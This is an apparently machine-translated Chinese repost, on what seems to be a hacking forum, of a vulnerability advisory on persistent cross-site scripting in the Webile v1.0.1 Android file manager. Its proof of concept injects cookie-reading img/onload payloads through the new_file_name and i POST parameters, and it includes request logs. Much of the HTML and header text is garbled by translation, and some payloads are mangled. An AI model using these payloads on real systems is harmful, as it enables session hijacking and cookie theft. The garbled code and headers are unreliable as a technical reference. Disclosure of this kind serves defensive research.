H

Webile v1.0.1-多个跨站点脚本

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
利用标题: Webile v1.0.1-多个跨站点脚本
参考(来源):
============================
发布日期:
=================
2023-07-03
脆弱性实验室ID(VL-ID):
==============================================
2321
常见的漏洞评分系统:
==============================================
5.5
漏洞class:
============================
跨站点脚本- 持久
当前的估计价格为:
================================
500€-1.000€
产品服务简介:
========================================
Webile是基于HTTP协议的局部网络跨平台文件管理工具。使用个人手机作为服务器
局域网,浏览手机文件,上传文件,下载文件,播放视频,浏览图片,传输数据,
统计文件,显示性能等。无需连接到Internet,您可以浏览文件,发送数据,播放视频和其他
通过WiFi LAN或手机热点功能,并且在数据传输过程中不会生成其他数据流量。支持Mac,
Windows,Linux,iOS,Android和其他多平台操作系统。
(homepage:https://play.google.com/store/apps/details?id=com.wifile.wewelehl=engl=us的副本)
摘要咨询信息:
======================================
漏洞实验室核心研究团队在Webile v1.0.1 WiFi移动Android Web应用程序中发现了多个持续的Web漏洞。
受影响的产品:
============================
产品所有者: WEBE
Product: Weble V1.0.1-(框架)(移动网络应用程序)
漏洞披露时间表:
============================================
2022-10-113360研究人员通知协调(安全研究人员)
2022-10-123360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-03:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(客人特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
独立安全研究
技术详细信息描述:
=====================================
在Webile v1.0.1 Wifi移动Android Web应用程序中发现了多个持久输入验证Web漏洞。
该漏洞使远程攻击者可以将自己的恶意脚本代码注入持久攻击向量,以妥协浏览器
Web应用程序来自应用程序端。
持续的输入验证Web漏洞位于发送和添加功能中。远程攻击者能够注入自己的恶意
脚本代码到new_file_name和i参数帖子方法请求,以引发对畸形内容的持续执行。
成功剥削脆弱性会导致会议劫持,持续的网络钓鱼攻击,持续的外部重定向到恶意
源和持续操纵受影响的应用程序模块。
请求方法:
[+]帖子
脆弱参数:
[+] new_file_name
[+] i
概念证明(POC):
================================
持续的输入验证Web漏洞可以由没有用户帐户且用户交互较低的远程攻击者利用。
为了进行安全示范或复制持续的跨站点网络漏洞,遵循以下提供的信息和步骤继续进行。
脆弱的源:发送
将消息发送到电话列表
div class='layui-colla-item'
div class='layui-card-header'message/div
div class='layui-colla-content'样式='display:block; padding-left:16px;'
div class='layui-form-item layui-form-text'id='showmsg'divfont color='blue'20:10:11/fonta href='javascript:''
title='copy'onclick='复制(1658081411827)'i class='iconfont'nbsp; nbsp; nbsp;/i/abr
跨度ID='C_1658081411827'TEST2'IIMG src='evil.source'onload='alert(document.cookie)'/iimg/spanbr/div
/div/div/div/div
历史记录消息
表级='layui-table layui-form'
Theadtr
th style='text-align:中心;垂直- align:中间!宽度='2%'align='center'
输入type='复选框'lay-filter='checkall'name=''lay-skin='primary'div class='layui-unselect layui-unselect layui-form-checkbox'lay-skin='prientar'i class='layui-icon layui-icon layui-icon-ok'/i/i/i/i/div/th
th style='边界- 权利:1px;'消息/th
th style='text-align:中心;垂直- align:中间!宽度='15%'日期/th
th style='text-align:中心;垂直- align:中间!宽度='3%'valign='Center'Action/th/tr
/tead
tbodytr
TD样式='Text-Align:中心;垂直ALIGN:中间! Align='Center'
输入类型='复选框'名称='id'值='3'lay-skin='primary'div class='layui-unselect layui-form-checkbox'lay-skin='primary'i class='layui-icon layui-icon layui-icon-ok'/i/i/div
/TD
TD样式='Height:32Px;'跨度id='c_3'test2'iimg src='evil.source'onload='alert(document.cookie)'/iimg/span/td
TD Align='Center'2022/07/17 20:10/TD
td class='td-manage'style='边框- 右翼:1px; text-align:center;'
title='copy'onclick='copy(3)'href='javascript:'
我class='iconfont'nbsp; nbsp;/i
/一个
标题='delete'onClick='deletElog(this,3)'href='javascript:'
我class='layui-icon'nbsp; nbsp;/i
/a/td/tr/tbody/table
--- POC会话日志#1(帖子)---(添加)
HOST: LOCALHOST:8080
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 210
原始:http://localhost:8080
Connection:保持空白
Referer:http://localhost:8080/webile_files
cookie: treeview=0; SessionID=B21814D80862DE9A06B7086CC737DAE6
i={'action':'create','file_path':'/storage/emulation/0','new_file_name':'pwnd23'iimg src=evil.source=evil.source onload=onload=alload=alload(documen.cookie)/iimg'}/iimg'}/iimg'}
-
POST: HTTP/1.1 200好
content-type:应用程序/json
Connection:保持空白
内容编码: GZIP
转移编码:分块
-
HOST: LOCALHOST:8080
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
Referer:http://localhost:8080/webile_files
cookie: treeview=0; SessionID=B21814D80862DE9A06B7086CC737DAE6
升级- 不肯定- requests: 1
-
GET: HTTP/1.1 200好
content-type:应用程序/钟表流
Connection:保持空白
内容长度: 0
-
cookie:
TreeView=0; SessionID=B21814D80862DE9A06B7086CC737DAE6
--- POC会话日志#2(帖子)---(发送)
HOST: LOCALHOST:8080
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 180
原始:http://localhost:8080
Connection:保持空白
Referer:http://localhost:8080/webile_send
cookie: treeview=0; SessionID=B21814D80862DE9A06B7086CC737DAE6
i={'os':'windows Windows 10','B':'FireFox 102.0','C':'iimg src=evil.source onload=alload=alload=alert(documen.cookie)/iimg'}
-
POST: HTTP/1.1 200好
content-type:应用程序/json
Connection:保持空白
内容编码: GZIP
转移编码:分块
-
HOST: LOCALHOST:8080
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:102.0)gecko/20100101 Firefox/102.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: de,en-us; q=0.7,en; q=0.3
Accept-incoding: Gzip,放气
Connection:保持空白
Referer:http://localhost:8080/webile_send
cookie: treeview=0; SessionID=B21814D80862DE9A06B7086CC737DAE6
升级- 不肯定- requests: 1
-
GET: HTTP/1.1 200好
content-type:应用程序/钟表流
日期: Sun,17 Jul 2022 18:08336033 GMT
Connection:保持空白
内容长度: 0
安全风险:
===================
移动Web应用程序中持续的Web漏洞的安全风险估计为媒介。
 
后退
顶部